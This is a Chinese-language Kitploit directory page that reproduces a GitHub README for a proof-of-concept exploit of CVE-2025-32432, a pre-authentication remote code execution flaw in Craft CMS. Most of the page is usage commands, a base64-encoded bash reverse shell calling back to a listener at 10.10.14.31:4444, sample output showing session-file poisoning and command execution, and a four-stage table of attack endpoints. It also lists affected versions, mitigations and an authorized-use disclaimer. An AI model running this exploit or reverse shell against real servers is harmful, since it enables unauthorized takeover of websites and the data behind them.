Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-32432 — 利用 CVE-2025-32432 的漏洞利用程序与 PoC,CraftCMS2Shell | Kitploit
工具/GitHubGitHub/c0gnit00/cve-2025-32432
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试红队Payload 开发
GitHubc0gnit00/cve-2025-32432

CVE-2025-32432

利用 CVE-2025-32432 的漏洞利用程序与 PoC,CraftCMS2Shell

查看仓库
321个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-32432 Craft CMS 预认证远程代码执行 PoC

Craft CMS 中的严重预认证远程代码执行漏洞

受影响版本:Craft CMS 3.x、4.x 及 5.x(最高至 5.6.16)

信息: 此漏洞利用已在 HackTheBox Orion 机器上测试通过

概述

本仓库包含针对 CVE-2025-32432 的概念验证漏洞利用代码,该漏洞是 Craft CMS 中的一个严重预认证远程代码执行漏洞。攻击者无需认证即可利用 Yii2 的行为附件机制以及通过 __class 覆盖技术进行 PHP 对象实例化,在服务器上执行任意 PHP 代码。

CVSS 评分:10.0(严重)

功能特性

  • 预认证利用 — 无需登录凭据
  • 通用兼容性 — 适用于 Craft CMS 3.x、4.x 及 5.x
  • 自动资源 ID 发现 — 自动暴力破解有效资源 ID
  • CSRF 令牌提取 — 自动处理 Craft CMS 的 CSRF 防护
  • 会话路径回退 — 若首次尝试失败,自动重试替代 PHP 会话路径

依赖环境

root@kitploit:~
pip install requests urllib3

快速开始

基本命令执行

root@kitploit:~
python3 exploit.py -u http://target.com -c "id"

反弹 Shell

root@kitploit:~
# 在机器上启动监听器
penelope -p 4444

# base64 编码 payload
echo 'exec bash -i >& /dev/tcp/10.10.14.31/4444 0>&1' | base64


# 运行漏洞利用
python3 exploit.py -u http://orion.htb -c "echo 'ZXhlYyBiYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjMxLzQ0NDQgMD4mMQo=' | base64 -d | bash"

跳过资源 ID 暴力破解(若已知)

root@kitploit:~
python3 exploit.py -u http://target.com -c "whoami" -a 11

使用备用会话路径

root@kitploit:~
python3 exploit.py -u http://target.com -c "id" \
  -s "/tmp/sess_{}"

使用方法

root@kitploit:~
usage: exploit.py [-h] -u URL -c COMMAND [-a ASSET_ID] [-m MAX_ASSET]
                                [-s SESSION_PATH] [-q]

CVE-2025-32432 Craft CMS 预认证远程代码执行漏洞利用 v2

选项:
  -h, --help            显示此帮助信息并退出
  -u, --url URL         目标 URL(例如 http://target.com)
  -c, --command COMMAND
                        要执行的命令
  -a, --asset-id ASSET_ID
                        已知有效资源 ID(跳过暴力破解)
  -m, --max-asset MAX_ASSET
                        暴力破解的最大资源 ID(默认:300)
  -s, --session-path SESSION_PATH
                        会话文件路径模板(默认:/var/lib/php/sessions/sess_{})
  -q, --quiet           抑制详细输出

示例输出

root@kitploit:~
$ python3 exploit.py -u http://orion.htb -c "id"

╔══════════════════════════════════════════════════════════════╗
║  CVE-2025-32432 Craft CMS Pre-Auth RCE PoC v2              ║
║  Target: http://orion.htb                                  ║
║  Command: id                                                  ║
╚══════════════════════════════════════════════════════════════╝

[+] Stage 1: Getting session cookie and CSRF token...
[✓] Session ID: q6458g6g8njeimu59n9l65cu1e
[✓] CSRF Token: ofuxX9FLAA7gSDxLqxYtJGLZVHpPCm...
[+] Stage 2: Poisoning session file with PHP code...
[+] Poison request returned: 200
[✓] Session file poisoned
[+] Stage 3: Brute-forcing asset ID (1-300)...
[✓] Valid asset ID found: 1 (HTTP 200)
[+] Stage 4: Triggering RCE via PhpManager gadget chain...
[+] Target session file: /var/lib/php/sessions/sess_q6458g6g8njeimu59n9l65cu1e
[+] Trigger request returned: 200
[✓] COMMAND OUTPUT:
============================================================
uid=33(www-data) gid=33(www-data) groups=33(www-data)
============================================================

漏洞利用阶段

受影响版本

分支受影响版本修复版本
3.x3.0.0-RC1 – 3.9.143.9.15+
4.x4.0.0-RC1 – 4.14.144.14.15+
5.x5.0.0-RC1 – 5.6.165.6.17+

缓解措施

  1. 立即升级 至最新的已修补版本
  2. 监控日志 中是否存在以下行为:
    • 对 /admin/actions/assets/generate-transform 的多个 POST 请求
    • 对管理员页面的 GET 请求中带有包含 PHP 代码的 a= 参数
    • POST 请求主体中存在 as 字段
  3. 启用 WAF 规则 以拦截可疑模式

致谢

  • 原始发现者:Orange Cyberdefense / SensePost
  • 博客文章:Investigating an in-the-wild campaign using RCE in CraftCMS
  • PoC 作者:基于 SensePost 的研究,针对 HTB/渗透测试场景改编

免责声明

此工具仅用于授权的安全测试与研究目的。未经授权访问计算机系统属于违法行为。请务必在测试前获取适当授权。

许可证

MIT 许可证 - 详情请参阅 LICENSE 文件。

下载工具
阶段操作端点需认证
1提取会话 Cookie 及 CSRF 令牌GET /admin/login否
2向会话文件注入 PHP 载荷GET /index.php?p=admin/dashboard&a=<PHP>否
3暴力破解有效资源 IDPOST /index.php?p=admin/actions/assets/generate-transform否
4通过 PhpManager 组件触发远程代码执行POST /index.php?p=admin/actions/assets/generate-transform&cmd=<CMD>否